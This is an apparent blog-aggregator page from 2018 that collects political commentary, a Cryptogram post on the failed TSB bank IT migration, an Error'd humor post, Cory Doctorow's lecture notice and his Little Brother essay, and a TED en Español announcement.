Rondam RamblingsCredit where it's due

Richard Nixon is rightfully remembered as one of the great villains of American democracy.  But he wasn't all bad.  He opened relations with China, appointed four mostly sane Supreme Court justices, and oversaw the establishment of the EPA among many other accomplishments.  Likewise, I believe that Donald Trump will eventually go down in history as one of the worst (if not the worst) president

Rondam RamblingsAn open letter to Jack Phillips

[Jack Phillips is the owner of the Masterpiece Cake Shop in Lakewood, Colorado.  Mr. Phillips is being sued by the Colorado Civil Rights Commission for refusing to make a wedding cake for a gay couple.  His case is currently before the U.S. Supreme Court.  Yesterday Mr. Phillips published an op-ed in The Washington Post to which this letter is a response.] Dear Mr. Phillips: Imagine your child

Rondam RamblingsPaul Ryan forces out House chaplain

Just in case there was the slightest ember of hope in your mind that Republicans actually care about religious freedom and are not just odious hypocritical power-grubbing opportunists, this should extinguish it once and for all: House Chaplain Patrick Conroy’s sudden resignation has sparked a furor on Capitol Hill, with sources in both parties saying he was pushed out by Speaker Paul Ryan (R-Wis

CryptogramTSB Bank Disaster

This seems like an absolute disaster:

The very short version is that a UK bank, TSB, which had been merged into and then many years later was spun out of Lloyds Bank, was bought by the Spanish bank Banco Sabadell in 2015. Lloyds had continued to run the TSB systems and was to transfer them over to Sabadell over the weekend. It's turned out to be an epic failure, and it's not clear if and when this can be straightened out.

It is bad enough that bank IT problem had been so severe and protracted a major newspaper, The Guardian, created a live blog for it that has now been running for two days.

The more serious issue is the fact that customers still can't access online accounts and even more disconcerting, are sometimes being allowed into other people's accounts, says there are massive problems with data integrity. That's a nightmare to sort out.

Even worse, the fact that this situation has persisted strongly suggests that Lloyds went ahead with the migration without allowing for a rollback.

This seems to be a mistake, and not enemy action.

Worse Than FailureError'd: Billboards Show Obvious Disasters

"Actually, this board is outside a casino in Sheffield which is next to the church, but we won't go there," writes Simon.

 

Wouter wrote, "The local gas station is now running ads for Windows 10 updates."

 

"If I were to legally change my name to a GUID, this is exactly what I'd pick," Lincoln K. wrote.

 

Robert F. writes, "Copy/Paste? Bah! If you really want to know how many log files are being generated per server, every minute, you're going to have to earn it by typing out this 'easy' command."

 

"I imagine someone pushed the '10 items or fewer' rule on the self-checkout kiosk just a little too far," Michael writes.

 

Wojciech wrote, "To think - someone actually doodled this JavaScript code!"

 

[Advertisement] Forget logs. Next time you're struggling to replicate error, crash and performance issues in your apps - Think Raygun! Installs in minutes. Learn more.

,

Cory DoctorowRaleigh-Durham, I’m headed your way! CORRECTED!

CORRECTION! The Flyleaf event is at 6PM, not 7!

I’m delivering the annual Kilgour lecture tomorrow morning at 10AM at UNC, and I’ll be speaking at Flyleaf Books at 6PM — be there or be oblong!

Also, if you’re in Boston, Waterloo or Chicago, you can catch me in the coming weeks!.

Abstract: For decades, regulators and corporations have viewed the internet and the computer as versatile material from which special-purpose tools can be fashioned: pornography distribution systems, jihadi recruiting networks, video-on-demand services, and so on.

But the computer is an unprecedented general purpose device capable of running every program we can express in symbolic language, and the internet is the nervous system of the 21st century, webbing these pluripotent computers together.

For decades, activists have been warning regulators and corporations about the peril in getting it wrong when we make policies for these devices, and now the chickens have come home to roost. Frivolous, dangerous and poorly thought-through choices have brought us to the brink of electronic ruin.

We are balanced on the knife-edge of peak indifference — the moment at which people start to care and clamor for action — and the point of no return, the moment at which it’s too late for action to make a difference. There was never a more urgent moment to fight for a free, fair and open internet — and there was never an internet more capable of coordinating that fight.

Cory DoctorowLittle Brother is 10 years old today: I reveal the secret of writing future-proof science fiction


It’s been ten years since the publication of my bestselling novel Little Brother; though the novel was written more than a decade ago, and though it deals with networked computers and mobile devices, it remains relevant, widely read, and widely cited even today.

In an essay for Tor.com, I write about my formula for creating fiction about technology that stays relevant — the secret is basically to assume that people will be really stupid about technology for the foreseeable future.

And now we come to how to write fiction about networked computers that stays relevant for 12 years and 22 years and 50 years: just write stories in which computers can run all the programs, and almost no one understands that fact. Just write stories in which authority figures, and mass movements, and well-meaning people, and unethical businesses, all insist that because they have a *really good reason* to want to stop some program from running or some message from being received, it *must* be possible.

Write those stories, and just remember that because computers can run every program and the internet can carry any message, every device will someday be a general-purpose computer in a fancy box (office towers, cars, pacemakers, voting machines, toasters, mixer-taps on faucets) and every message will someday be carried on the public internet. Just remember that the internet makes it easier for people of like mind to find each other and organize to work together for whatever purpose stirs them to action, including terrible ones and noble ones. Just remember that cryptography works, that your pocket distraction rectangle can scramble messages so thoroughly that they can never, ever be descrambled, not in a trillion years, without your revealing the passphrase used to protect them. Just remember that swords have two edges, that the universe doesn’t care how badly you want something, and that every time we make a computer a little better for one purpose, we improve it for every purpose a computer can be put to, and that is all purposes.


Just remember that declaring war on general purpose computing is a fool’s errand, and that that never stopped anyone.


Ten Years of Cory Doctorow’s Little Brother [Cory Doctorow/Tor.com]


(Image: Missy Ward, CC-BY)

TEDTED hosts first-ever TED en Español Spanish-language speaker event at NYC headquarters

Thursday, April 26, 2018 – Today marks the first-ever TED en Español speaker event hosted by TED in its New York City office. The all-Spanish daytime event, held in TED’s theater in Manhattan, will feature eight speakers, a musical performance, five short films and fifteen 1-minute talks given by members of the audience. 150 people are expected to attend from around the world, and about 20 TEDx events in 10 countries plan to tune in to watch remotely.

The New York event is just the latest addition to TED’s sweeping new Spanish-language TED en Español initiative, designed to spread ideas to the global Hispanic community. Led by TED’s Gerry Garbulsky, also head of the world’s largest TEDx event – TEDxRiodelaPlata in Argentina – TED en Español includes a Facebook community, Twitter feed, weekly ¨Boletín¨ newsletter, YouTube channel and – as of earlier this month – an original podcast created in partnership with Univision Communications.

“As part of our nonprofit mission at TED, we work to find and spread the best ideas no matter where the speakers live or what language they speak,” said Gerry. “We want everyone to have access to ideas in their own language. Given the massive global Hispanic population, we’ve begun the work to bring Spanish-language ideas directly to Spanish-speaking audiences, and today event is a major step in solidifying our commitment to that effort.”

Today´s speakers include chef Gastón Acurio, futurist Juan Enriquez, entrepreneur Leticia Gasca, data scientist César A. Hidalgo, founder and funder Rebeca Hwang, ocean expert Enric Sala, assistant conductor of the LA Philharmonic Paolo Bortolameolli, and psychologist and dancer César Silveyra. Musical group LADAMA will perform.